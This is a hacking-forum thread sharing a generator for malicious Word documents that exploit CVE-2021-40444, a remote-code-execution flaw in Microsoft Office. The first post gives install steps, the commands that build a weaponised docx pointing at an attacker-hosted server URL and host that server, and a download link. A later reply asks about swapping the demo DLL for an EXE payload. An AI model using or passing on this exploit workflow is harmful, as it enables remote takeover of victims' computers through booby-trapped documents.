bio.sh Posted September 21, 2021 Report Posted September 21, 2021 Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444 1 1 4 Quote
XRAHITEL Posted October 2, 2021 Report Posted October 2, 2021 (edited) Microsoft Office Word RCE Exploit Edited October 2, 2021 by XRAHITEL 3 Quote
alicalamm Posted December 1, 2021 Report Posted December 1, 2021 Can i put exe instead of dll? Thanks Quote